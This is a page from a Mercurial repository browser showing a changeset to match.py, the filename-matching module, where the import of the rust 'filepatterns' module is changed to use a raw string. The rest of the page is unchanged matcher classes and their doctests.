##// END OF EJS Templates
py3: do not convert rust module/attribute names to bytes...
Yuya Nishihara -
r43011:9c589dde default draft
parent child Browse files
Show More
@@ -1,1526 +1,1526 b''
1 1 # match.py - filename matching
2 2 #
3 3 # Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import, print_function
9 9
10 10 import copy
11 11 import itertools
12 12 import os
13 13 import re
14 14
15 15 from .i18n import _
16 16 from . import (
17 17 encoding,
18 18 error,
19 19 pathutil,
20 20 policy,
21 21 pycompat,
22 22 util,
23 23 )
24 24 from .utils import (
25 25 stringutil,
26 26 )
27 27
28 rustmod = policy.importrust('filepatterns')
28 rustmod = policy.importrust(r'filepatterns')
29 29
30 30 allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
31 31 'rootglob',
32 32 'listfile', 'listfile0', 'set', 'include', 'subinclude',
33 33 'rootfilesin')
34 34 cwdrelativepatternkinds = ('relpath', 'glob')
35 35
36 36 propertycache = util.propertycache
37 37
38 38 def _rematcher(regex):
39 39 '''compile the regexp with the best available regexp engine and return a
40 40 matcher function'''
41 41 m = util.re.compile(regex)
42 42 try:
43 43 # slightly faster, provided by facebook's re2 bindings
44 44 return m.test_match
45 45 except AttributeError:
46 46 return m.match
47 47
48 48 def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
49 49 '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
50 50 matchers = []
51 51 other = []
52 52
53 53 for kind, pat, source in kindpats:
54 54 if kind == 'set':
55 55 if ctx is None:
56 56 raise error.ProgrammingError("fileset expression with no "
57 57 "context")
58 58 matchers.append(ctx.matchfileset(pat, badfn=badfn))
59 59
60 60 if listsubrepos:
61 61 for subpath in ctx.substate:
62 62 sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
63 63 pm = prefixdirmatcher(subpath, sm, badfn=badfn)
64 64 matchers.append(pm)
65 65
66 66 continue
67 67 other.append((kind, pat, source))
68 68 return matchers, other
69 69
70 70 def _expandsubinclude(kindpats, root):
71 71 '''Returns the list of subinclude matcher args and the kindpats without the
72 72 subincludes in it.'''
73 73 relmatchers = []
74 74 other = []
75 75
76 76 for kind, pat, source in kindpats:
77 77 if kind == 'subinclude':
78 78 sourceroot = pathutil.dirname(util.normpath(source))
79 79 pat = util.pconvert(pat)
80 80 path = pathutil.join(sourceroot, pat)
81 81
82 82 newroot = pathutil.dirname(path)
83 83 matcherargs = (newroot, '', [], ['include:%s' % path])
84 84
85 85 prefix = pathutil.canonpath(root, root, newroot)
86 86 if prefix:
87 87 prefix += '/'
88 88 relmatchers.append((prefix, matcherargs))
89 89 else:
90 90 other.append((kind, pat, source))
91 91
92 92 return relmatchers, other
93 93
94 94 def _kindpatsalwaysmatch(kindpats):
95 95 """"Checks whether the kindspats match everything, as e.g.
96 96 'relpath:.' does.
97 97 """
98 98 for kind, pat, source in kindpats:
99 99 if pat != '' or kind not in ['relpath', 'glob']:
100 100 return False
101 101 return True
102 102
103 103 def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
104 104 listsubrepos=False, badfn=None):
105 105 matchers = []
106 106 fms, kindpats = _expandsets(kindpats, ctx=ctx,
107 107 listsubrepos=listsubrepos, badfn=badfn)
108 108 if kindpats:
109 109 m = matchercls(root, kindpats, badfn=badfn)
110 110 matchers.append(m)
111 111 if fms:
112 112 matchers.extend(fms)
113 113 if not matchers:
114 114 return nevermatcher(badfn=badfn)
115 115 if len(matchers) == 1:
116 116 return matchers[0]
117 117 return unionmatcher(matchers)
118 118
119 119 def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
120 120 auditor=None, ctx=None, listsubrepos=False, warn=None,
121 121 badfn=None, icasefs=False):
122 122 r"""build an object to match a set of file patterns
123 123
124 124 arguments:
125 125 root - the canonical root of the tree you're matching against
126 126 cwd - the current working directory, if relevant
127 127 patterns - patterns to find
128 128 include - patterns to include (unless they are excluded)
129 129 exclude - patterns to exclude (even if they are included)
130 130 default - if a pattern in patterns has no explicit type, assume this one
131 131 auditor - optional path auditor
132 132 ctx - optional changecontext
133 133 listsubrepos - if True, recurse into subrepositories
134 134 warn - optional function used for printing warnings
135 135 badfn - optional bad() callback for this matcher instead of the default
136 136 icasefs - make a matcher for wdir on case insensitive filesystems, which
137 137 normalizes the given patterns to the case in the filesystem
138 138
139 139 a pattern is one of:
140 140 'glob:<glob>' - a glob relative to cwd
141 141 're:<regexp>' - a regular expression
142 142 'path:<path>' - a path relative to repository root, which is matched
143 143 recursively
144 144 'rootfilesin:<path>' - a path relative to repository root, which is
145 145 matched non-recursively (will not match subdirectories)
146 146 'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
147 147 'relpath:<path>' - a path relative to cwd
148 148 'relre:<regexp>' - a regexp that needn't match the start of a name
149 149 'set:<fileset>' - a fileset expression
150 150 'include:<path>' - a file of patterns to read and include
151 151 'subinclude:<path>' - a file of patterns to match against files under
152 152 the same directory
153 153 '<something>' - a pattern of the specified default type
154 154
155 155 Usually a patternmatcher is returned:
156 156 >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
157 157 <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>
158 158
159 159 Combining 'patterns' with 'include' (resp. 'exclude') gives an
160 160 intersectionmatcher (resp. a differencematcher):
161 161 >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
162 162 <class 'mercurial.match.intersectionmatcher'>
163 163 >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
164 164 <class 'mercurial.match.differencematcher'>
165 165
166 166 Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
167 167 >>> match(b'foo', b'.', [])
168 168 <alwaysmatcher>
169 169
170 170 The 'default' argument determines which kind of pattern is assumed if a
171 171 pattern has no prefix:
172 172 >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
173 173 <patternmatcher patterns='.*\\.c$'>
174 174 >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
175 175 <patternmatcher patterns='main\\.py(?:/|$)'>
176 176 >>> match(b'foo', b'.', [b'main.py'], default=b're')
177 177 <patternmatcher patterns='main.py'>
178 178
179 179 The primary use of matchers is to check whether a value (usually a file
180 180 name) matches againset one of the patterns given at initialization. There
181 181 are two ways of doing this check.
182 182
183 183 >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])
184 184
185 185 1. Calling the matcher with a file name returns True if any pattern
186 186 matches that file name:
187 187 >>> m(b'a')
188 188 True
189 189 >>> m(b'main.c')
190 190 True
191 191 >>> m(b'test.py')
192 192 False
193 193
194 194 2. Using the exact() method only returns True if the file name matches one
195 195 of the exact patterns (i.e. not re: or glob: patterns):
196 196 >>> m.exact(b'a')
197 197 True
198 198 >>> m.exact(b'main.c')
199 199 False
200 200 """
201 201 normalize = _donormalize
202 202 if icasefs:
203 203 dirstate = ctx.repo().dirstate
204 204 dsnormalize = dirstate.normalize
205 205
206 206 def normalize(patterns, default, root, cwd, auditor, warn):
207 207 kp = _donormalize(patterns, default, root, cwd, auditor, warn)
208 208 kindpats = []
209 209 for kind, pats, source in kp:
210 210 if kind not in ('re', 'relre'): # regex can't be normalized
211 211 p = pats
212 212 pats = dsnormalize(pats)
213 213
214 214 # Preserve the original to handle a case only rename.
215 215 if p != pats and p in dirstate:
216 216 kindpats.append((kind, p, source))
217 217
218 218 kindpats.append((kind, pats, source))
219 219 return kindpats
220 220
221 221 if patterns:
222 222 kindpats = normalize(patterns, default, root, cwd, auditor, warn)
223 223 if _kindpatsalwaysmatch(kindpats):
224 224 m = alwaysmatcher(badfn)
225 225 else:
226 226 m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
227 227 listsubrepos=listsubrepos, badfn=badfn)
228 228 else:
229 229 # It's a little strange that no patterns means to match everything.
230 230 # Consider changing this to match nothing (probably using nevermatcher).
231 231 m = alwaysmatcher(badfn)
232 232
233 233 if include:
234 234 kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
235 235 im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
236 236 listsubrepos=listsubrepos, badfn=None)
237 237 m = intersectmatchers(m, im)
238 238 if exclude:
239 239 kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
240 240 em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
241 241 listsubrepos=listsubrepos, badfn=None)
242 242 m = differencematcher(m, em)
243 243 return m
244 244
245 245 def exact(files, badfn=None):
246 246 return exactmatcher(files, badfn=badfn)
247 247
248 248 def always(badfn=None):
249 249 return alwaysmatcher(badfn)
250 250
251 251 def never(badfn=None):
252 252 return nevermatcher(badfn)
253 253
254 254 def badmatch(match, badfn):
255 255 """Make a copy of the given matcher, replacing its bad method with the given
256 256 one.
257 257 """
258 258 m = copy.copy(match)
259 259 m.bad = badfn
260 260 return m
261 261
262 262 def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
263 263 '''Convert 'kind:pat' from the patterns list to tuples with kind and
264 264 normalized and rooted patterns and with listfiles expanded.'''
265 265 kindpats = []
266 266 for kind, pat in [_patsplit(p, default) for p in patterns]:
267 267 if kind in cwdrelativepatternkinds:
268 268 pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
269 269 elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
270 270 pat = util.normpath(pat)
271 271 elif kind in ('listfile', 'listfile0'):
272 272 try:
273 273 files = util.readfile(pat)
274 274 if kind == 'listfile0':
275 275 files = files.split('\0')
276 276 else:
277 277 files = files.splitlines()
278 278 files = [f for f in files if f]
279 279 except EnvironmentError:
280 280 raise error.Abort(_("unable to read file list (%s)") % pat)
281 281 for k, p, source in _donormalize(files, default, root, cwd,
282 282 auditor, warn):
283 283 kindpats.append((k, p, pat))
284 284 continue
285 285 elif kind == 'include':
286 286 try:
287 287 fullpath = os.path.join(root, util.localpath(pat))
288 288 includepats = readpatternfile(fullpath, warn)
289 289 for k, p, source in _donormalize(includepats, default,
290 290 root, cwd, auditor, warn):
291 291 kindpats.append((k, p, source or pat))
292 292 except error.Abort as inst:
293 293 raise error.Abort('%s: %s' % (pat, inst[0]))
294 294 except IOError as inst:
295 295 if warn:
296 296 warn(_("skipping unreadable pattern file '%s': %s\n") %
297 297 (pat, stringutil.forcebytestr(inst.strerror)))
298 298 continue
299 299 # else: re or relre - which cannot be normalized
300 300 kindpats.append((kind, pat, ''))
301 301 return kindpats
302 302
303 303 class basematcher(object):
304 304
305 305 def __init__(self, badfn=None):
306 306 if badfn is not None:
307 307 self.bad = badfn
308 308
309 309 def __call__(self, fn):
310 310 return self.matchfn(fn)
311 311 # Callbacks related to how the matcher is used by dirstate.walk.
312 312 # Subscribers to these events must monkeypatch the matcher object.
313 313 def bad(self, f, msg):
314 314 '''Callback from dirstate.walk for each explicit file that can't be
315 315 found/accessed, with an error message.'''
316 316
317 317 # If an explicitdir is set, it will be called when an explicitly listed
318 318 # directory is visited.
319 319 explicitdir = None
320 320
321 321 # If an traversedir is set, it will be called when a directory discovered
322 322 # by recursive traversal is visited.
323 323 traversedir = None
324 324
325 325 @propertycache
326 326 def _files(self):
327 327 return []
328 328
329 329 def files(self):
330 330 '''Explicitly listed files or patterns or roots:
331 331 if no patterns or .always(): empty list,
332 332 if exact: list exact files,
333 333 if not .anypats(): list all files and dirs,
334 334 else: optimal roots'''
335 335 return self._files
336 336
337 337 @propertycache
338 338 def _fileset(self):
339 339 return set(self._files)
340 340
341 341 def exact(self, f):
342 342 '''Returns True if f is in .files().'''
343 343 return f in self._fileset
344 344
345 345 def matchfn(self, f):
346 346 return False
347 347
348 348 def visitdir(self, dir):
349 349 '''Decides whether a directory should be visited based on whether it
350 350 has potential matches in it or one of its subdirectories. This is
351 351 based on the match's primary, included, and excluded patterns.
352 352
353 353 Returns the string 'all' if the given directory and all subdirectories
354 354 should be visited. Otherwise returns True or False indicating whether
355 355 the given directory should be visited.
356 356 '''
357 357 return True
358 358
359 359 def visitchildrenset(self, dir):
360 360 '''Decides whether a directory should be visited based on whether it
361 361 has potential matches in it or one of its subdirectories, and
362 362 potentially lists which subdirectories of that directory should be
363 363 visited. This is based on the match's primary, included, and excluded
364 364 patterns.
365 365
366 366 This function is very similar to 'visitdir', and the following mapping
367 367 can be applied:
368 368
369 369 visitdir | visitchildrenlist
370 370 ----------+-------------------
371 371 False | set()
372 372 'all' | 'all'
373 373 True | 'this' OR non-empty set of subdirs -or files- to visit
374 374
375 375 Example:
376 376 Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
377 377 the following values (assuming the implementation of visitchildrenset
378 378 is capable of recognizing this; some implementations are not).
379 379
380 380 '' -> {'foo', 'qux'}
381 381 'baz' -> set()
382 382 'foo' -> {'bar'}
383 383 # Ideally this would be 'all', but since the prefix nature of matchers
384 384 # is applied to the entire matcher, we have to downgrade this to
385 385 # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
386 386 # in.
387 387 'foo/bar' -> 'this'
388 388 'qux' -> 'this'
389 389
390 390 Important:
391 391 Most matchers do not know if they're representing files or
392 392 directories. They see ['path:dir/f'] and don't know whether 'f' is a
393 393 file or a directory, so visitchildrenset('dir') for most matchers will
394 394 return {'f'}, but if the matcher knows it's a file (like exactmatcher
395 395 does), it may return 'this'. Do not rely on the return being a set
396 396 indicating that there are no files in this dir to investigate (or
397 397 equivalently that if there are files to investigate in 'dir' that it
398 398 will always return 'this').
399 399 '''
400 400 return 'this'
401 401
402 402 def always(self):
403 403 '''Matcher will match everything and .files() will be empty --
404 404 optimization might be possible.'''
405 405 return False
406 406
407 407 def isexact(self):
408 408 '''Matcher will match exactly the list of files in .files() --
409 409 optimization might be possible.'''
410 410 return False
411 411
412 412 def prefix(self):
413 413 '''Matcher will match the paths in .files() recursively --
414 414 optimization might be possible.'''
415 415 return False
416 416
417 417 def anypats(self):
418 418 '''None of .always(), .isexact(), and .prefix() is true --
419 419 optimizations will be difficult.'''
420 420 return not self.always() and not self.isexact() and not self.prefix()
421 421
422 422 class alwaysmatcher(basematcher):
423 423 '''Matches everything.'''
424 424
425 425 def __init__(self, badfn=None):
426 426 super(alwaysmatcher, self).__init__(badfn)
427 427
428 428 def always(self):
429 429 return True
430 430
431 431 def matchfn(self, f):
432 432 return True
433 433
434 434 def visitdir(self, dir):
435 435 return 'all'
436 436
437 437 def visitchildrenset(self, dir):
438 438 return 'all'
439 439
440 440 def __repr__(self):
441 441 return r'<alwaysmatcher>'
442 442
443 443 class nevermatcher(basematcher):
444 444 '''Matches nothing.'''
445 445
446 446 def __init__(self, badfn=None):
447 447 super(nevermatcher, self).__init__(badfn)
448 448
449 449 # It's a little weird to say that the nevermatcher is an exact matcher
450 450 # or a prefix matcher, but it seems to make sense to let callers take
451 451 # fast paths based on either. There will be no exact matches, nor any
452 452 # prefixes (files() returns []), so fast paths iterating over them should
453 453 # be efficient (and correct).
454 454 def isexact(self):
455 455 return True
456 456
457 457 def prefix(self):
458 458 return True
459 459
460 460 def visitdir(self, dir):
461 461 return False
462 462
463 463 def visitchildrenset(self, dir):
464 464 return set()
465 465
466 466 def __repr__(self):
467 467 return r'<nevermatcher>'
468 468
469 469 class predicatematcher(basematcher):
470 470 """A matcher adapter for a simple boolean function"""
471 471
472 472 def __init__(self, predfn, predrepr=None, badfn=None):
473 473 super(predicatematcher, self).__init__(badfn)
474 474 self.matchfn = predfn
475 475 self._predrepr = predrepr
476 476
477 477 @encoding.strmethod
478 478 def __repr__(self):
479 479 s = (stringutil.buildrepr(self._predrepr)
480 480 or pycompat.byterepr(self.matchfn))
481 481 return '<predicatenmatcher pred=%s>' % s
482 482
483 483 def normalizerootdir(dir, funcname):
484 484 if dir == '.':
485 485 util.nouideprecwarn("match.%s() no longer accepts "
486 486 "'.', use '' instead." % funcname, '5.1')
487 487 return ''
488 488 return dir
489 489
490 490
491 491 class patternmatcher(basematcher):
492 492 """Matches a set of (kind, pat, source) against a 'root' directory.
493 493
494 494 >>> kindpats = [
495 495 ... (b're', br'.*\.c$', b''),
496 496 ... (b'path', b'foo/a', b''),
497 497 ... (b'relpath', b'b', b''),
498 498 ... (b'glob', b'*.h', b''),
499 499 ... ]
500 500 >>> m = patternmatcher(b'foo', kindpats)
501 501 >>> m(b'main.c') # matches re:.*\.c$
502 502 True
503 503 >>> m(b'b.txt')
504 504 False
505 505 >>> m(b'foo/a') # matches path:foo/a
506 506 True
507 507 >>> m(b'a') # does not match path:b, since 'root' is 'foo'
508 508 False
509 509 >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
510 510 True
511 511 >>> m(b'lib.h') # matches glob:*.h
512 512 True
513 513
514 514 >>> m.files()
515 515 ['', 'foo/a', 'b', '']
516 516 >>> m.exact(b'foo/a')
517 517 True
518 518 >>> m.exact(b'b')
519 519 True
520 520 >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
521 521 False
522 522 """
523 523
524 524 def __init__(self, root, kindpats, badfn=None):
525 525 super(patternmatcher, self).__init__(badfn)
526 526
527 527 self._files = _explicitfiles(kindpats)
528 528 self._prefix = _prefix(kindpats)
529 529 self._pats, self.matchfn = _buildmatch(kindpats, '$', root)
530 530
531 531 @propertycache
532 532 def _dirs(self):
533 533 return set(util.dirs(self._fileset))
534 534
535 535 def visitdir(self, dir):
536 536 dir = normalizerootdir(dir, 'visitdir')
537 537 if self._prefix and dir in self._fileset:
538 538 return 'all'
539 539 return (dir in self._fileset or
540 540 dir in self._dirs or
541 541 any(parentdir in self._fileset
542 542 for parentdir in util.finddirs(dir)))
543 543
544 544 def visitchildrenset(self, dir):
545 545 ret = self.visitdir(dir)
546 546 if ret is True:
547 547 return 'this'
548 548 elif not ret:
549 549 return set()
550 550 assert ret == 'all'
551 551 return 'all'
552 552
553 553 def prefix(self):
554 554 return self._prefix
555 555
556 556 @encoding.strmethod
557 557 def __repr__(self):
558 558 return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))
559 559
560 560 # This is basically a reimplementation of util.dirs that stores the children
561 561 # instead of just a count of them, plus a small optional optimization to avoid
562 562 # some directories we don't need.
563 563 class _dirchildren(object):
564 564 def __init__(self, paths, onlyinclude=None):
565 565 self._dirs = {}
566 566 self._onlyinclude = onlyinclude or []
567 567 addpath = self.addpath
568 568 for f in paths:
569 569 addpath(f)
570 570
571 571 def addpath(self, path):
572 572 if path == '':
573 573 return
574 574 dirs = self._dirs
575 575 findsplitdirs = _dirchildren._findsplitdirs
576 576 for d, b in findsplitdirs(path):
577 577 if d not in self._onlyinclude:
578 578 continue
579 579 dirs.setdefault(d, set()).add(b)
580 580
581 581 @staticmethod
582 582 def _findsplitdirs(path):
583 583 # yields (dirname, basename) tuples, walking back to the root. This is
584 584 # very similar to util.finddirs, except:
585 585 # - produces a (dirname, basename) tuple, not just 'dirname'
586 586 # Unlike manifest._splittopdir, this does not suffix `dirname` with a
587 587 # slash.
588 588 oldpos = len(path)
589 589 pos = path.rfind('/')
590 590 while pos != -1:
591 591 yield path[:pos], path[pos + 1:oldpos]
592 592 oldpos = pos
593 593 pos = path.rfind('/', 0, pos)
594 594 yield '', path[:oldpos]
595 595
596 596 def get(self, path):
597 597 return self._dirs.get(path, set())
598 598
599 599 class includematcher(basematcher):
600 600
601 601 def __init__(self, root, kindpats, badfn=None):
602 602 super(includematcher, self).__init__(badfn)
603 603
604 604 self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
605 605 self._prefix = _prefix(kindpats)
606 606 roots, dirs, parents = _rootsdirsandparents(kindpats)
607 607 # roots are directories which are recursively included.
608 608 self._roots = set(roots)
609 609 # dirs are directories which are non-recursively included.
610 610 self._dirs = set(dirs)
611 611 # parents are directories which are non-recursively included because
612 612 # they are needed to get to items in _dirs or _roots.
613 613 self._parents = parents
614 614
615 615 def visitdir(self, dir):
616 616 dir = normalizerootdir(dir, 'visitdir')
617 617 if self._prefix and dir in self._roots:
618 618 return 'all'
619 619 return (dir in self._roots or
620 620 dir in self._dirs or
621 621 dir in self._parents or
622 622 any(parentdir in self._roots
623 623 for parentdir in util.finddirs(dir)))
624 624
625 625 @propertycache
626 626 def _allparentschildren(self):
627 627 # It may seem odd that we add dirs, roots, and parents, and then
628 628 # restrict to only parents. This is to catch the case of:
629 629 # dirs = ['foo/bar']
630 630 # parents = ['foo']
631 631 # if we asked for the children of 'foo', but had only added
632 632 # self._parents, we wouldn't be able to respond ['bar'].
633 633 return _dirchildren(
634 634 itertools.chain(self._dirs, self._roots, self._parents),
635 635 onlyinclude=self._parents)
636 636
637 637 def visitchildrenset(self, dir):
638 638 if self._prefix and dir in self._roots:
639 639 return 'all'
640 640 # Note: this does *not* include the 'dir in self._parents' case from
641 641 # visitdir, that's handled below.
642 642 if ('' in self._roots or
643 643 dir in self._roots or
644 644 dir in self._dirs or
645 645 any(parentdir in self._roots
646 646 for parentdir in util.finddirs(dir))):
647 647 return 'this'
648 648
649 649 if dir in self._parents:
650 650 return self._allparentschildren.get(dir) or set()
651 651 return set()
652 652
653 653 @encoding.strmethod
654 654 def __repr__(self):
655 655 return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))
656 656
657 657 class exactmatcher(basematcher):
658 658 r'''Matches the input files exactly. They are interpreted as paths, not
659 659 patterns (so no kind-prefixes).
660 660
661 661 >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
662 662 >>> m(b'a.txt')
663 663 True
664 664 >>> m(b'b.txt')
665 665 False
666 666
667 667 Input files that would be matched are exactly those returned by .files()
668 668 >>> m.files()
669 669 ['a.txt', 're:.*\\.c$']
670 670
671 671 So pattern 're:.*\.c$' is not considered as a regex, but as a file name
672 672 >>> m(b'main.c')
673 673 False
674 674 >>> m(br're:.*\.c$')
675 675 True
676 676 '''
677 677
678 678 def __init__(self, files, badfn=None):
679 679 super(exactmatcher, self).__init__(badfn)
680 680
681 681 if isinstance(files, list):
682 682 self._files = files
683 683 else:
684 684 self._files = list(files)
685 685
686 686 matchfn = basematcher.exact
687 687
688 688 @propertycache
689 689 def _dirs(self):
690 690 return set(util.dirs(self._fileset))
691 691
692 692 def visitdir(self, dir):
693 693 dir = normalizerootdir(dir, 'visitdir')
694 694 return dir in self._dirs
695 695
696 696 def visitchildrenset(self, dir):
697 697 dir = normalizerootdir(dir, 'visitchildrenset')
698 698
699 699 if not self._fileset or dir not in self._dirs:
700 700 return set()
701 701
702 702 candidates = self._fileset | self._dirs - {''}
703 703 if dir != '':
704 704 d = dir + '/'
705 705 candidates = set(c[len(d):] for c in candidates if
706 706 c.startswith(d))
707 707 # self._dirs includes all of the directories, recursively, so if
708 708 # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
709 709 # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
710 710 # '/' in it, indicating a it's for a subdir-of-a-subdir; the
711 711 # immediate subdir will be in there without a slash.
712 712 ret = {c for c in candidates if '/' not in c}
713 713 # We really do not expect ret to be empty, since that would imply that
714 714 # there's something in _dirs that didn't have a file in _fileset.
715 715 assert ret
716 716 return ret
717 717
718 718 def isexact(self):
719 719 return True
720 720
721 721 @encoding.strmethod
722 722 def __repr__(self):
723 723 return ('<exactmatcher files=%r>' % self._files)
724 724
725 725 class differencematcher(basematcher):
726 726 '''Composes two matchers by matching if the first matches and the second
727 727 does not.
728 728
729 729 The second matcher's non-matching-attributes (bad, explicitdir,
730 730 traversedir) are ignored.
731 731 '''
732 732 def __init__(self, m1, m2):
733 733 super(differencematcher, self).__init__()
734 734 self._m1 = m1
735 735 self._m2 = m2
736 736 self.bad = m1.bad
737 737 self.explicitdir = m1.explicitdir
738 738 self.traversedir = m1.traversedir
739 739
740 740 def matchfn(self, f):
741 741 return self._m1(f) and not self._m2(f)
742 742
743 743 @propertycache
744 744 def _files(self):
745 745 if self.isexact():
746 746 return [f for f in self._m1.files() if self(f)]
747 747 # If m1 is not an exact matcher, we can't easily figure out the set of
748 748 # files, because its files() are not always files. For example, if
749 749 # m1 is "path:dir" and m2 is "rootfileins:.", we don't
750 750 # want to remove "dir" from the set even though it would match m2,
751 751 # because the "dir" in m1 may not be a file.
752 752 return self._m1.files()
753 753
754 754 def visitdir(self, dir):
755 755 if self._m2.visitdir(dir) == 'all':
756 756 return False
757 757 elif not self._m2.visitdir(dir):
758 758 # m2 does not match dir, we can return 'all' here if possible
759 759 return self._m1.visitdir(dir)
760 760 return bool(self._m1.visitdir(dir))
761 761
762 762 def visitchildrenset(self, dir):
763 763 m2_set = self._m2.visitchildrenset(dir)
764 764 if m2_set == 'all':
765 765 return set()
766 766 m1_set = self._m1.visitchildrenset(dir)
767 767 # Possible values for m1: 'all', 'this', set(...), set()
768 768 # Possible values for m2: 'this', set(...), set()
769 769 # If m2 has nothing under here that we care about, return m1, even if
770 770 # it's 'all'. This is a change in behavior from visitdir, which would
771 771 # return True, not 'all', for some reason.
772 772 if not m2_set:
773 773 return m1_set
774 774 if m1_set in ['all', 'this']:
775 775 # Never return 'all' here if m2_set is any kind of non-empty (either
776 776 # 'this' or set(foo)), since m2 might return set() for a
777 777 # subdirectory.
778 778 return 'this'
779 779 # Possible values for m1: set(...), set()
780 780 # Possible values for m2: 'this', set(...)
781 781 # We ignore m2's set results. They're possibly incorrect:
782 782 # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
783 783 # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
784 784 # return set(), which is *not* correct, we still need to visit 'dir'!
785 785 return m1_set
786 786
787 787 def isexact(self):
788 788 return self._m1.isexact()
789 789
790 790 @encoding.strmethod
791 791 def __repr__(self):
792 792 return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))
793 793
794 794 def intersectmatchers(m1, m2):
795 795 '''Composes two matchers by matching if both of them match.
796 796
797 797 The second matcher's non-matching-attributes (bad, explicitdir,
798 798 traversedir) are ignored.
799 799 '''
800 800 if m1 is None or m2 is None:
801 801 return m1 or m2
802 802 if m1.always():
803 803 m = copy.copy(m2)
804 804 # TODO: Consider encapsulating these things in a class so there's only
805 805 # one thing to copy from m1.
806 806 m.bad = m1.bad
807 807 m.explicitdir = m1.explicitdir
808 808 m.traversedir = m1.traversedir
809 809 return m
810 810 if m2.always():
811 811 m = copy.copy(m1)
812 812 return m
813 813 return intersectionmatcher(m1, m2)
814 814
815 815 class intersectionmatcher(basematcher):
816 816 def __init__(self, m1, m2):
817 817 super(intersectionmatcher, self).__init__()
818 818 self._m1 = m1
819 819 self._m2 = m2
820 820 self.bad = m1.bad
821 821 self.explicitdir = m1.explicitdir
822 822 self.traversedir = m1.traversedir
823 823
824 824 @propertycache
825 825 def _files(self):
826 826 if self.isexact():
827 827 m1, m2 = self._m1, self._m2
828 828 if not m1.isexact():
829 829 m1, m2 = m2, m1
830 830 return [f for f in m1.files() if m2(f)]
831 831 # It neither m1 nor m2 is an exact matcher, we can't easily intersect
832 832 # the set of files, because their files() are not always files. For
833 833 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
834 834 # "path:dir2", we don't want to remove "dir2" from the set.
835 835 return self._m1.files() + self._m2.files()
836 836
837 837 def matchfn(self, f):
838 838 return self._m1(f) and self._m2(f)
839 839
840 840 def visitdir(self, dir):
841 841 visit1 = self._m1.visitdir(dir)
842 842 if visit1 == 'all':
843 843 return self._m2.visitdir(dir)
844 844 # bool() because visit1=True + visit2='all' should not be 'all'
845 845 return bool(visit1 and self._m2.visitdir(dir))
846 846
847 847 def visitchildrenset(self, dir):
848 848 m1_set = self._m1.visitchildrenset(dir)
849 849 if not m1_set:
850 850 return set()
851 851 m2_set = self._m2.visitchildrenset(dir)
852 852 if not m2_set:
853 853 return set()
854 854
855 855 if m1_set == 'all':
856 856 return m2_set
857 857 elif m2_set == 'all':
858 858 return m1_set
859 859
860 860 if m1_set == 'this' or m2_set == 'this':
861 861 return 'this'
862 862
863 863 assert isinstance(m1_set, set) and isinstance(m2_set, set)
864 864 return m1_set.intersection(m2_set)
865 865
866 866 def always(self):
867 867 return self._m1.always() and self._m2.always()
868 868
869 869 def isexact(self):
870 870 return self._m1.isexact() or self._m2.isexact()
871 871
872 872 @encoding.strmethod
873 873 def __repr__(self):
874 874 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
875 875
876 876 class subdirmatcher(basematcher):
877 877 """Adapt a matcher to work on a subdirectory only.
878 878
879 879 The paths are remapped to remove/insert the path as needed:
880 880
881 881 >>> from . import pycompat
882 882 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
883 883 >>> m2 = subdirmatcher(b'sub', m1)
884 884 >>> m2(b'a.txt')
885 885 False
886 886 >>> m2(b'b.txt')
887 887 True
888 888 >>> m2.matchfn(b'a.txt')
889 889 False
890 890 >>> m2.matchfn(b'b.txt')
891 891 True
892 892 >>> m2.files()
893 893 ['b.txt']
894 894 >>> m2.exact(b'b.txt')
895 895 True
896 896 >>> def bad(f, msg):
897 897 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
898 898 >>> m1.bad = bad
899 899 >>> m2.bad(b'x.txt', b'No such file')
900 900 sub/x.txt: No such file
901 901 """
902 902
903 903 def __init__(self, path, matcher):
904 904 super(subdirmatcher, self).__init__()
905 905 self._path = path
906 906 self._matcher = matcher
907 907 self._always = matcher.always()
908 908
909 909 self._files = [f[len(path) + 1:] for f in matcher._files
910 910 if f.startswith(path + "/")]
911 911
912 912 # If the parent repo had a path to this subrepo and the matcher is
913 913 # a prefix matcher, this submatcher always matches.
914 914 if matcher.prefix():
915 915 self._always = any(f == path for f in matcher._files)
916 916
